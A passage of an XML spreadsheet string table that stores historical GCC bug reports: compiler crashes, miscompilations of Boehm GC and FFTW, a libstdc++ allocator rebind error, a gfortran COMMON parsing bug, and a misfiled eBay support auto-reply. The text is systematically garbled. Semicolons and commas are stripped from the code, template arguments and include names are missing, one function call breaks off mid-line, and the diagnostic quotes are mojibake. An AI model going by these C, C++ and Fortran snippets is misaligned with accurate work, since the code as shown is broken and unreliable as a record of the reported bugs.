http://gcc.gnu.org/ml/gcc-testresults/2005-12/msg00889.html
http://gcc.gnu.org/ml/gcc-testresults/2005-12/msg00891.html
http://gcc.gnu.org/ml/gcc-testresults/2005-12/msg00888.html
The failures look like this:
FAIL: gcc.dg/tree-ssa/loop-3.c scan-tree-dump-times step: 1</t>
  </si>
  <si>
    <t>dalej</t>
  </si>
  <si>
    <t>GCC-48</t>
  </si>
  <si>
    <t>initialization of static arrays</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Mon 27 Sep 1999 15:56:43 +0900
 Original-Message-Id: 
 Reply-to: gas@hep.stanford.edu
 Greetings
	 The following short piece of code compiles fine using
	 egcs-2.91.66 but not 2.95.1:
 class HepString {
 public:
   inline HepString()
   // Constructs empty string.
   HepString(const char *)
   // Constructs string from a character array.
   inline ~HepString()
   // Destroys string deallocating storage.
 }
 const HepString names[10][5] = {
   { b1(1235)   h1(1170)   h1(1380)      k1(1270)      k1(1270) }
   { a0(1450)   f0(1370)            k0_star(1430) k0_star(1430) }
   { a1(1260)   f1(1285)   f1(1420)      k1(1400)      k1(1400) }
   { a2(1320)   f2(1270)f2_prime(1525)k2_star(1430)k2_star(1430)}
   {pi2(1670) eta2(1645) eta2(1870)      k2(1770)      k2(1770) }
   {rho(1700) omega(1600)            k_star(1680)  k_star(1680) }
  {rho3(1690)omega3(1670)phi3(1850) k3_star(1780) k3_star(1780) }
   { pi(1300)  eta(1295)  eta(1440)       k(1460)       k(1460) }
   {rho(1450)omega(1420)  phi(1680)  k_star(1410)  k_star(1410) }
   {            f2(1810)   f2(2010) k2_star(1980) k2_star(1980) }
 }
 ////////////////////////////////////////////////////////////////
	 In the new compiler it produces the following irrational
	 error message ten times:
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
	 Obviously the compiler was never asked to convert from
	 const HepString[5] to HepString.  It must be confused.
	 Here is the complete set of information as requested in
	 http://www.fsf.org/software/gcc/faq.html#bugreport:
 [gas@radon1 ~]$ g++ -v --save-temps testqqq.cc
 Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/specs
 gcc version 2.95.1 19990816 (release)
  /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ testqqq.cc testqqq.ii
 GNU CPP version 2.95.1 19990816 (release) (i386 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/../../../../include/g++-3
  /usr/local/include
  /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/../../../../i686-pc-linux-gnu/include
  /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search path:
 End of omitted list.
  /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/cc1plus testqqq.ii -quiet -dumpbase testqqq.cc -version -o testqqq.s
 GNU C++ version 2.95.1 19990816 (release) (i686-pc-linux-gnu) compiled by GNU C version 2.95.1 19990816 (release).
 testqqq.cc: In function `void __static_initialization_and_destruction_0(int int)':
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
 testqqq.cc:14: conversion from `const HepString[5]' to non-scalar type `HepString' requested
	 Note that the above demonstration code doesn't actually do
	 anything (other than demonstrate the bug).  The bug was
	 initially found when attempting to compile Geant4.0.1
	 from CERN which is known to compile and execute just fine
	 with egcs-2.91.60.
	 I hope you can identify and fix this one quickly because
	 it seems like a real problem.
	 Keep up the good work!
						 Sincerely
						 Glenn Horton-Smith
						 gas@awa.tohoku.ac.jp
  [In gcc version 2.96 20000302 the compiler says
    In function `void __static_initialization_and_destruction_0 (int int)':
    Internal compiler error in `emit_move_insn' at expr.c:2548
   -- Martin v. LÃ¶wis ]
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-7037</t>
  </si>
  <si>
    <t>Receipt of your email to eBay Customer Support  (KMM53724504V14873L0KM)</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for writing to eBay's Customer Support Team. 
 IMPORTANT NOTE: In the future this email address will no longer be 
 available. Instead all Customer Support queries should be sent using 
 our online webform found at:
   http://pages.ebay.com/help/basics/select-support.html
 For quick access to the Customer Support webform you may want to 
 bookmark the page for future reference.
 Sincerely 
 eBay Customer Support Team
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-17468</t>
  </si>
  <si>
    <t>[4.0 regression] Java garbage collector miscompiled at -O1 and higher</t>
  </si>
  <si>
    <t>The (ancient) GC_descr_obj_sz() function in boehm-gc/typd_mlc.c is miscompiled 
by gcc4.0 20040913.  This was also true for the version from two weeks before 
that.  This usually causes make check in boehm-gc to fail.  However this 
function is not normally used by the gcj runtime.
I distilled this down to the self-contained example which is appended.  Some 
quick attempts to simplify this further by removing switch cases failed.
It is fairly easy to trace through the assembly code for the LEAF_TAG (=1) 
case and see that there is a problem.  For example the multiplication never 
happens.
I haven't had a chence to check this on other platforms.  It may be a generic 
issue.
-fno-strict-alias has no effect and I don't see how it could.
Hans
/* Array descriptors.  GC_array_mark_proc understands these.	*/
/* We may eventually need to add provisions for headers and	*/
/* trailers.  Hence we provide for tree structured descriptors */
/* though we don't really use them currently.			*/
typedef union ComplexDescriptor {
    struct LeafDescriptor {	/* Describes simple array	*/
        unsigned long ld_tag
#	define LEAF_TAG 1
	unsigned long ld_size		/* bytes per element	*/
				/* multiple of ALIGNMENT	*/
	unsigned long ld_nelements	/* Number of elements.	*/
	unsigned long ld_descriptor /* A simple length bitmap	*/
				/* or procedure descriptor.	*/
    } ld
    struct ComplexArrayDescriptor {
        unsigned long ad_tag
#	define ARRAY_TAG 2
	unsigned long ad_nelements
	union ComplexDescriptor * ad_element_descr
    } ad
    struct SequenceDescriptor {
        unsigned long sd_tag
#	define SEQUENCE_TAG 3
	union ComplexDescriptor * sd_first
	union ComplexDescriptor * sd_second
    } sd
} complex_descriptor
#define TAG ld.ld_tag
/* Return the size of the object described by d.  It would be faster to	*/
/* store this directly or to compute it as part of			*/
/* GC_push_complex_descriptor but hopefully it doesn't matter.		*/
unsigned long GC_descr_obj_size(d)
register complex_descriptor *d
{
    switch(d -&gt; TAG) {
      case LEAF_TAG:
      	return(d -&gt; ld.ld_nelements * d -&gt; ld.ld_size)
      case ARRAY_TAG:
        return(d -&gt; ad.ad_nelements
               * GC_descr_obj_size(d -&gt; ad.ad_element_descr))
      case SEQUENCE_TAG:
        return(GC_descr_obj_size(d -&gt; sd.sd_first)
               + GC_descr_obj_size(d -&gt; sd.sd_second))
      default:
        return 17
        /*NOTREACHED*/ return 0 /*NOTREACHED*/
    }
}
int main()
{
   complex_descriptor d
   d.ld.ld_tag = 1
   d.ld.ld_size = 2
   d.ld.ld_nelements = 3
   if (GC_descr_obj_size(
   return 0
}</t>
  </si>
  <si>
    <t>Hans.Boehm</t>
  </si>
  <si>
    <t>GCC-55944</t>
  </si>
  <si>
    <t>[C++11] static local member with constexpr c'tor causes ICE</t>
  </si>
  <si>
    <t>While testing bug 55931 on gcc 4.8.0 20130106 (experimental) using the compiler flags 
-Wall -std=c++11 -pedantic
the following program causes an ICE:
//-----------------------------------
template
struct Test
{
  constexpr Test(T val) : value(val) {}
  static void test()
  {
    static constexpr Test x(42) // ICE
  }
  T value
}
int main()
{
  static constexpr Test x(42) // OK
  Test::test()
}
//-----------------------------------
7|internal compiler error: tree check: expected target_expr have cast_expr in check_initializer at cp/decl.c:5699
This program should be accepted.</t>
  </si>
  <si>
    <t>GCC-56170</t>
  </si>
  <si>
    <t>Extension debug_allocator seems non-compliant w.r.t. rebind</t>
  </si>
  <si>
    <t>It seems that the useful debug_allocator can only be used directly not through rebinding. If so this limits its use in many situations. 
E.g. here is some code that tries to use it with a list:
#include 
#include 
using namespace std
int main()
{
    list &gt; &gt; a
    return 0
}
and here is the output:
In file included from /usr/include/c++/4.7/list:64:0
                 from gcc.cpp:1:
/usr/include/c++/4.7/bits/stl_list.h: In instantiation of â€˜class std::_List_base &gt; &gt;â€™:
/usr/include/c++/4.7/bits/stl_list.h:436:11:   required from â€˜class std::list &gt; &gt;â€™
gcc.cpp:8:66:   required from here
/usr/include/c++/4.7/bits/stl_list.h:307:9: error: no class template named â€˜rebindâ€™ in â€˜class __gnu_cxx::debug_allocator &gt;â€™
/usr/include/c++/4.7/bits/stl_list.h:309:60: error: no class template named â€˜rebindâ€™ in â€˜class __gnu_cxx::debug_allocator &gt;â€™
/usr/include/c++/4.7/bits/stl_list.h: In instantiation of â€˜class std::list &gt; &gt;â€™:
gcc.cpp:8:66:   required from here
/usr/include/c++/4.7/bits/stl_list.h:469:20: error: no members matching â€˜std::list &gt; &gt;::_Base {aka std::_List_base &gt; &gt;}::_M_get_Tp_allocatorâ€™ in â€˜std::list &gt; &gt;::_Base {aka class std::_List_base &gt; &gt;}â€™
/usr/include/c++/4.7/bits/stl_list.h:470:20: error: no members matching â€˜std::list &gt; &gt;::_Base {aka std::_List_base &gt; &gt;}::_M_get_Node_allocatorâ€™ in â€˜std::list &gt; &gt;::_Base {aka class std::_List_base &gt; &gt;}â€™
In file included from /usr/include/c++/4.7/list:65:0
                 from gcc.cpp:1:
/usr/include/c++/4.7/bits/list.tcc: In instantiation of â€˜void std::_List_base::_M_clear() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™:
/usr/include/c++/4.7/bits/stl_list.h:379:9:   required from â€˜std::_List_base::~_List_base() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™
/usr/include/c++/4.7/bits/stl_list.h:436:11:   required from here
/usr/include/c++/4.7/bits/list.tcc:78:4: error: â€˜_M_get_Tp_allocatorâ€™ was not declared in this scope
In file included from /usr/include/c++/4.7/list:64:0
                 from gcc.cpp:1:
/usr/include/c++/4.7/bits/stl_list.h: In instantiation of â€˜std::_List_base::_List_impl::_List_impl() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™:
/usr/include/c++/4.7/bits/stl_list.h:361:17:   required from â€˜std::_List_base::_List_base() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™
/usr/include/c++/4.7/bits/stl_list.h:522:15:   required from â€˜std::list::list() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™
gcc.cpp:8:66:   required from here
/usr/include/c++/4.7/bits/stl_list.h:317:32: error: no class template named â€˜rebindâ€™ in â€˜class __gnu_cxx::debug_allocator &gt;â€™
atavory@atavory-len:~$ g++ gcc.cpp &gt; tmp.txt
atavory@atavory-len:~$ g++ gcc.cpp &gt; tmp.txt
In file included from /usr/include/c++/4.7/list:64:0
                 from gcc.cpp:1:
/usr/include/c++/4.7/bits/stl_list.h: In instantiation of â€˜class std::_List_base &gt; &gt;â€™:
/usr/include/c++/4.7/bits/stl_list.h:436:11:   required from â€˜class std::list &gt; &gt;â€™
gcc.cpp:8:66:   required from here
/usr/include/c++/4.7/bits/stl_list.h:307:9: error: no class template named â€˜rebindâ€™ in â€˜class __gnu_cxx::debug_allocator &gt;â€™
/usr/include/c++/4.7/bits/stl_list.h:309:60: error: no class template named â€˜rebindâ€™ in â€˜class __gnu_cxx::debug_allocator &gt;â€™
/usr/include/c++/4.7/bits/stl_list.h: In instantiation of â€˜class std::list &gt; &gt;â€™:
gcc.cpp:8:66:   required from here
/usr/include/c++/4.7/bits/stl_list.h:469:20: error: no members matching â€˜std::list &gt; &gt;::_Base {aka std::_List_base &gt; &gt;}::_M_get_Tp_allocatorâ€™ in â€˜std::list &gt; &gt;::_Base {aka class std::_List_base &gt; &gt;}â€™
/usr/include/c++/4.7/bits/stl_list.h:470:20: error: no members matching â€˜std::list &gt; &gt;::_Base {aka std::_List_base &gt; &gt;}::_M_get_Node_allocatorâ€™ in â€˜std::list &gt; &gt;::_Base {aka class std::_List_base &gt; &gt;}â€™
In file included from /usr/include/c++/4.7/list:65:0
                 from gcc.cpp:1:
/usr/include/c++/4.7/bits/list.tcc: In instantiation of â€˜void std::_List_base::_M_clear() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™:
/usr/include/c++/4.7/bits/stl_list.h:379:9:   required from â€˜std::_List_base::~_List_base() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™
/usr/include/c++/4.7/bits/stl_list.h:436:11:   required from here
/usr/include/c++/4.7/bits/list.tcc:78:4: error: â€˜_M_get_Tp_allocatorâ€™ was not declared in this scope
In file included from /usr/include/c++/4.7/list:64:0
                 from gcc.cpp:1:
/usr/include/c++/4.7/bits/stl_list.h: In instantiation of â€˜std::_List_base::_List_impl::_List_impl() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™:
/usr/include/c++/4.7/bits/stl_list.h:361:17:   required from â€˜std::_List_base::_List_base() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™
/usr/include/c++/4.7/bits/stl_list.h:522:15:   required from â€˜std::list::list() [with _Tp = int _Alloc = __gnu_cxx::debug_allocator &gt;]â€™
gcc.cpp:8:66:   required from here
/usr/include/c++/4.7/bits/stl_list.h:317:32: error: no class template named â€˜rebindâ€™ in â€˜class __gnu_cxx::debug_allocator &gt;â€™
  Thanks!</t>
  </si>
  <si>
    <t>atavory</t>
  </si>
  <si>
    <t>GCC-48452</t>
  </si>
  <si>
    <t>[C++0x][SFINAE] Failures with n-ary initialization expressions (in return type)</t>
  </si>
  <si>
    <t>Some n-ary initialization expressions in a SFINAE context used in a return type definition either give hard errors:
  a) any T =&gt; abstract class
  b) cv void =&gt; T (T is a class type)
or give the wrong result:
  c) when void is initialized with more than one argument
#include  // for declval
template
decltype(T(std::declval()...) char()) f(int)
template
char (
struct A { virtual ~A() = 0 }
struct B {}
static_assert(sizeof(f(0)) != 1 Error) // a
static_assert(sizeof(f(0)) != 1 Error) // b
static_assert(sizeof(f(0)) != 1 Error) // c
a) error: cannot allocate an object of abstract type 'A' because the
following virtual functions are pure within 'A': virtual A::~A()
b) error: invalid use of void expression
c) Assertion triggers!</t>
  </si>
  <si>
    <t>GCC-26528</t>
  </si>
  <si>
    <t>[4.2 regression] gcc miscompiles FFTW 3.1</t>
  </si>
  <si>
    <t>Current mainline gcc appears to miscompile FFTW:
wget http://fftw.org/fftw-3.1.tar.gz
tar xvzf fftw-3.1.tar.gz
cd fftw-3.1
/scratch/fftw-3.1&gt; gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /scratch/gcc/configure --quiet --prefix=/afs/mpa/data/martin/ugcc --enable-languages=c++fortran --with-gmp=/usr/local/appl/gmp-4.1.4 --enable-checking=release --without-makeinfo
Thread model: posix
gcc version 4.2.0 20060301 (experimental)
/scratch/fftw-3.1&gt; ./configure --enable-portable-binary
[...]
/scratch/fftw-3.1&gt; make check
[...]
Executing /scratch/fftw-3.1/tests/bench --verbose=1   --verify ok12o10x6e10x11o00v7 --verify ik12o10x
6e10x11o00v7 --verify obr3v79 --verify ibr3v79 --verify ofr3v79 --verify ifr3v79 --verify //obc3v79 --
verify //ibc3v79 --verify //ofc3v79 --verify //ifc3v79 --verify obc3v79 --verify ibc3v79 --verify ofc3
v79 --verify ifc3v79 --verify ok2hx5e00x3e10x7o11*6 --verify ik2hx5e00x3e10x7o11*6 --verify //obr10x8x
33 --verify //ofr10x8x33 --verify obr10x8x33 --verify ibr10x8x33 --verify ofr10x8x33 --verify ifr10x8x
33 --verify //obc10x8x33 --verify //ibc10x8x33 --verify //ofc10x8x33 --verify //ifc10x8x33 --verify ob
c10x8x33 --verify ibc10x8x33 --verify ofc10x8x33 --verify ifc10x8x33 --verify ok11o00*45 --verify ik11
o00*45 --verify obr6x4v7 --verify ibr6x4v7 --verify ofr6x4v7 --verify ifr6x4v7 --verify //obc6x4v7 --v
erify //ibc6x4v7 --verify //ofc6x4v7 --verify //ifc6x4v7 --verify obc6x4v7 --verify ibc6x4v7 --verify 
ofc6x4v7 --verify ifc6x4v7
2.65417e-16 4.02852e-15 3.09912e-16
2.76156e-16 2.52972e-15 2.83568e-16
2.17601e-16 3.37283e-16 2.97118e-16
2.03315e-16 3.37283e-16 2.49555e-16
2.33093e-16 1.49904e-16 3.95845e-16
2.09027e-16 1.49904e-16 3.70199e-16
1.94987e-16 2.24855e-16 4.92525e-16
1.97747e-16 2.24855e-16 5.28462e-16
1.71722e-16 2.24855e-16 4.74119e-16
2.0242e-16 2.24855e-16 5.51321e-16
1.85902e-16 2.24855e-16 4.94966e-16
2.13346e-16 2.24855e-16 4.9348e-16
2.12188e-16 2.24855e-16 5.26624e-16
2.12652e-16 2.24855e-16 4.99894e-16
2.75703e-16 2.60691e-15 2.91529e-16
4.46832e-16 4.43175e-15 3.46477e-16
FAILED /scratch/fftw-3.1/tests/bench:  --verify ok12o10x6e10x11o00v7 --verify ik12o10x6e10x11o00v7 --v
erify obr3v79 --verify ibr3v79 --verify ofr3v79 --verify ifr3v79 --verify //obc3v79 --verify //ibc3v79
 --verify //ofc3v79 --verify //ifc3v79 --verify obc3v79 --verify ibc3v79 --verify ofc3v79 --verify ifc
3v79 --verify ok2hx5e00x3e10x7o11*6 --verify ik2hx5e00x3e10x7o11*6 --verify //obr10x8x33 --verify //of
r10x8x33 --verify obr10x8x33 --verify ibr10x8x33 --verify ofr10x8x33 --verify ifr10x8x33 --verify //ob
c10x8x33 --verify //ibc10x8x33 --verify //ofc10x8x33 --verify //ifc10x8x33 --verify obc10x8x33 --verif
y ibc10x8x33 --verify ofc10x8x33 --verify ifc10x8x33 --verify ok11o00*45 --verify ik11o00*45 --verify 
obr6x4v7 --verify ibr6x4v7 --verify ofr6x4v7 --verify ifr6x4v7 --verify //obc6x4v7 --verify //ibc6x4v7
 --verify //ofc6x4v7 --verify //ifc6x4v7 --verify obc6x4v7 --verify ibc6x4v7 --verify ofc6x4v7 --verif
y ifc6x4v7
received signal 11
make[2]: *** [check-local] Error 1
make[2]: Leaving directory `/scratch/fftw-3.1/tests'
make[1]: *** [check-am] Error 2
make[1]: Leaving directory `/scratch/fftw-3.1/tests'
make: *** [check-recursive] Error 1
The current 4.1 and 4.0 branches pass the FFTW tests. Gomp-branch fails.
I know that this is not a very useful bug report but I have no idea how
to reduce the problem. A regression hunt might at least localise the problematic
commit and help to decide whether gcc or FFTW is to blame.</t>
  </si>
  <si>
    <t>GCC-60036</t>
  </si>
  <si>
    <t>[4.9 Regression] Spurious signedness conversion warning with relational operator</t>
  </si>
  <si>
    <t>Gcc-trunk emits a signedness conversion warning for the statement f ^= fn1() &gt; a. However as the value of fn1() &gt; a is either 1 or 0 the warning is not true. 
Moreover Gcc-4.8 and 4.7 do not output this warning. And if I change the statement to f = f ^ (fn1() &gt; a) gcc-trunk does not emit this warning either.
$: cat conversion-for-boolean.c
extern int fn1()
unsigned fn(int a) {
  unsigned f = 9
  f ^= fn1() &gt; a
  return f
}
$: gcc-trunk -c -Wconversion -std=c11 conversion-for-boolean.c
conversion-for-boolean.c: In function â€˜fnâ€™:
conversion-for-boolean.c:4:5: warning: conversion to â€˜unsigned intâ€™ from â€˜intâ€™ may change the sign of the result [-Wsign-conversion]
   f ^= fn1() &gt; a
     ^
$: gcc-4.8 -c -Wconversion -std=c11 conversion-for-boolean.c
$: gcc-4.7 -c -Wconversion -std=c11 conversion-for-boolean.c
$: gcc-trunk --version
gcc-trunk (GCC) 4.9.0 20140131 (experimental)
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-26223</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on long double with -mno-80387</t>
  </si>
  <si>
    <t>#include 
using namespace std
template 
complex add(complex a complex b) { return a + b }
template complex add(complex complex)
$ g++ -Wall tmp.cpp -mno-80387 -O2
tmp.cpp: In function std::complex add(std::complex std::complex) [with T = long double]:
tmp.cpp:5: error: insn does not satisfy its constraints:
(insn 48 18 49 0 (set (mem/c:XF (plus:DI (reg/f:DI 7 sp)
                (const_int 32 [0x20])) [0 S16 A8])
        (reg:XF 8 )) 99 {*movxf_integer} (nil)
    (nil))
tmp.cpp:5: internal compiler error: in reload_cse_simplify_operands
           at postreload.c:394
$ gcc -v
Reading specs from /usr/lib64/gcc/x86_64-pld-linux/4.1.0/specs
Target: x86_64-pld-linux
Configured with: ../configure --prefix=/usr --libdir=/usr/lib64 --libexecdir=/usr/lib64 --infodir=/usr/share/info --mandir=/usr/share/man --x-libraries=/usr/X11R6/lib64 --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-languages=cc++fortranobjcobj-c++adajava --enable-c99 --enable-long-long --disable-multilib --enable-nls --disable-werror --with-gnu-as --with-gnu-ld --with-demangler-in-ld --with-system-zlib --with-slibdir=/lib64 --enable-cmath --enable-libgcj --enable-libgcj-multifile --enable-libgcj-database --enable-gtk-cairo --enable-java-awt=gtkxlib --enable-jni --enable-xmlj --enable-alsa --enable-dssi x86_64-pld-linux
Thread model: posix
gcc version 4.1.0 20060210 (prerelease)
revision 110831</t>
  </si>
  <si>
    <t>GCC-287</t>
  </si>
  <si>
    <t>internal error</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Thu 13 Apr 2000 15:37:30 +0200 (CEST)
 Hello
 here is a little programm that causes an internal compiler error. If you
 need further help or information please contact me ...
 Daniel Hempel 
 ------------------------------------------------------------------------------
 gcc -v
 Reading specs from /usr/lib/gcc-lib/i486-linux/2.7.2.3/specs
 gcc version 2.7.2.3
 uname -a
 Linux hermesbaby 2.0.35 #38 Wed Feb 10 16:11:02 CET 1999 i586 unknown
 compiler options
 g++ -Wall -ansi -pedantic file.cc
 file.cc
 ______________________________________________________________________________
 template struct A
 {
   static const int len = k
 }
 // I am actually not sure if this is covered by the standard:
 // Please tell me if it isn't
 template
 void f(A b) 
 { }
 int main()
 {
   A b
   f &gt;(b)
   return 0
 }
 ------------------------------------------------------------------------------
 Compileroutput:
 file.cc: In function `int main()':
 file.cc:16: Internal compiler error.
 file.cc:16: Please submit a full bug report to `egcs-bugs@cygnus.com'.
 file.cc:16: See  for details.
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-69190</t>
  </si>
  <si>
    <t>FAIL: experimental/type_erased_allocator/uses_allocator.cc</t>
  </si>
  <si>
    <t>Commit r232129 causes the following fail on arm-none-eabi target:
FAIL: experimental/type_erased_allocator/uses_allocator.cc
due to bits/uses_allocator.h:102:20: error: '__addressof' is not a member of 'std'
It appears that bits/uses_allocator.h is missing an include on bits/move.h</t>
  </si>
  <si>
    <t>GCC-48214</t>
  </si>
  <si>
    <t>internal compiler error: in dwarf2out_var_location at dwarf2out.c:21983</t>
  </si>
  <si>
    <t>Revision 171033 [1] breaks bootstrap on alpha:
gmake[4]: Entering directory `/space/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/libsupc++'
/bin/sh ../libtool --tag CXX --tag disable-shared  --mode=compile /home/uros/gcc-build/./gcc/xgcc -shared-libgcc -B/home/uros/gcc-build/./gcc -nostdinc++ -L/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/src -L/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/alphaev68-unknown-linux-gnu/bin/ -B/usr/local/alphaev68-unknown-linux-gnu/lib/ -isystem /usr/local/alphaev68-unknown-linux-gnu/include -isystem /usr/local/alphaev68-unknown-linux-gnu/sys-include    -I/home/uros/gcc-svn/trunk/libstdc++-v3/../gcc -I/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/include/alphaev68-unknown-linux-gnu -I/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/include -I/home/uros/gcc-svn/trunk/libstdc++-v3/libsupc++  -fno-implicit-templates -prefer-pic -Wall -Wextra -Wwrite-strings -Wcast-qual  -fdiagnostics-show-location=once  -ffunction-sections -fdata-sections  -g -O2 -D_GNU_SOURCE -mieee  -c -o eh_alloc.lo ../../../../gcc-svn/trunk/libstdc++-v3/libsupc++/eh_alloc.cc
libtool: compile:  /home/uros/gcc-build/./gcc/xgcc -shared-libgcc -B/home/uros/gcc-build/./gcc -nostdinc++ -L/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/src -L/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/alphaev68-unknown-linux-gnu/bin/ -B/usr/local/alphaev68-unknown-linux-gnu/lib/ -isystem /usr/local/alphaev68-unknown-linux-gnu/include -isystem /usr/local/alphaev68-unknown-linux-gnu/sys-include -I/home/uros/gcc-svn/trunk/libstdc++-v3/../gcc -I/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/include/alphaev68-unknown-linux-gnu -I/home/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/include -I/home/uros/gcc-svn/trunk/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -D_GNU_SOURCE -mieee -c ../../../../gcc-svn/trunk/libstdc++-v3/libsupc++/eh_alloc.cc  -fPIC -DPIC -o eh_alloc.o
../../../../gcc-svn/trunk/libstdc++-v3/libsupc++/eh_alloc.cc: In function â€˜void* __cxxabiv1::__cxa_allocate_exception(std::size_t)â€™:
../../../../gcc-svn/trunk/libstdc++-v3/libsupc++/eh_alloc.cc:138:1: internal compiler error: in dwarf2out_var_location at dwarf2out.c:21983
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[4]: *** [eh_alloc.lo] Error 1
gmake[4]: Leaving directory `/space/uros/gcc-build/alphaev68-unknown-linux-gnu/libstdc++-v3/libsupc++'
The ICE can be triggered with a cross to alpha-linux-gnu with attached test.
~/gcc-build-alpha/gcc/cc1plus -O2 -g eh_alloc.ii
../../../../gcc-svn/trunk/libstdc++-v3/libsupc++/eh_alloc.cc: In function â€˜void* __cxxabiv1::__cxa_allocate_exception(std::size_t)â€™:
../../../../gcc-svn/trunk/libstdc++-v3/libsupc++/eh_alloc.cc:138:1: internal compiler error: in dwarf2out_var_location at dwarf2out.c:21983
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gdb session:
(gdb) up
#1  0x00000000006f1f42 in dwarf2out_var_location (loc_note=0x2aaaaee3a680)
    at ../../gcc-svn/trunk/gcc/dwarf2out.c:21979
21979	      gcc_assert (prev
(gdb) li
21974		= ggc_alloc_cleared_call_arg_loc_node ()
21975	      rtx prev = prev_real_insn (loc_note) x
21976	      ca_loc-&gt;call_arg_loc_note = loc_note
21977	      ca_loc-&gt;next = NULL
21978	      ca_loc-&gt;label = last_label
21979	      gcc_assert (prev
21980			  &amp;&amp; (CALL_P (prev)
21981			      || (NONJUMP_INSN_P (prev)
21982				  &amp;&amp; GET_CODE (PATTERN (prev)) == SEQUENCE
21983				  
(gdb) p debug_rtx (prev)
(const_int 2 [0x2])
[1] http://gcc.gnu.org/viewcvs?view=revision&amp;revision=171033</t>
  </si>
  <si>
    <t>GCC-9542</t>
  </si>
  <si>
    <t>How to change a PR without an account?</t>
  </si>
  <si>
    <t>Hi
I would like to change the synopsis of a bug report I wrote. With the current gnatsweb setup I have no clue how to due this. (I would need an account but I see no way to create one).
Olaf
Release:
unknown</t>
  </si>
  <si>
    <t>o.flebbe</t>
  </si>
  <si>
    <t>GCC-5123</t>
  </si>
  <si>
    <t>tree check: expected identifier_node have template_id_expr in build_component_ref at cp/typeck.c:2133</t>
  </si>
  <si>
    <t>Current cvs gcc ICE at illegal code:
struct C {
 template T f() { return 0 }
}
int main() {
  C c
  if(c.f!=0) return 1 // ICE (missing ())
  C* cp = 
  if(cp-&gt;f!=0) return 1 // ICE also 
  return 0
}
with message:
bug.cc: In function `int main()':
bug.cc:8: tree check: expected identifier_node have template_id_expr in
   build_component_ref at cp/typeck.c:2133
This bug related (maybe) to close but not fixed PR4987.
Vladimir Merzliakov
Release:
gcc version 3.1 20011214 (experimental)
Environment:
i386-unknown-freebsd4.4</t>
  </si>
  <si>
    <t>wanderer</t>
  </si>
  <si>
    <t>GCC-18869</t>
  </si>
  <si>
    <t>multiple common blocks in a single line rejected</t>
  </si>
  <si>
    <t>gfortran rejects the following valid syntax:
$ cat common.f90
program main
  common /foo/ a /bar/ b
  common /baz/ c /foobar/ d
end program main
$ gfortran common.f90
 In file common.f90:2
  common /foo/ a /bar/ b
                1
Error: Syntax error in COMMON statement at (1)
 In file common.f90:3
  common /baz/ c /foobar/ d
               1
Error: Syntax error in COMMON statement at (1)</t>
  </si>
  <si>
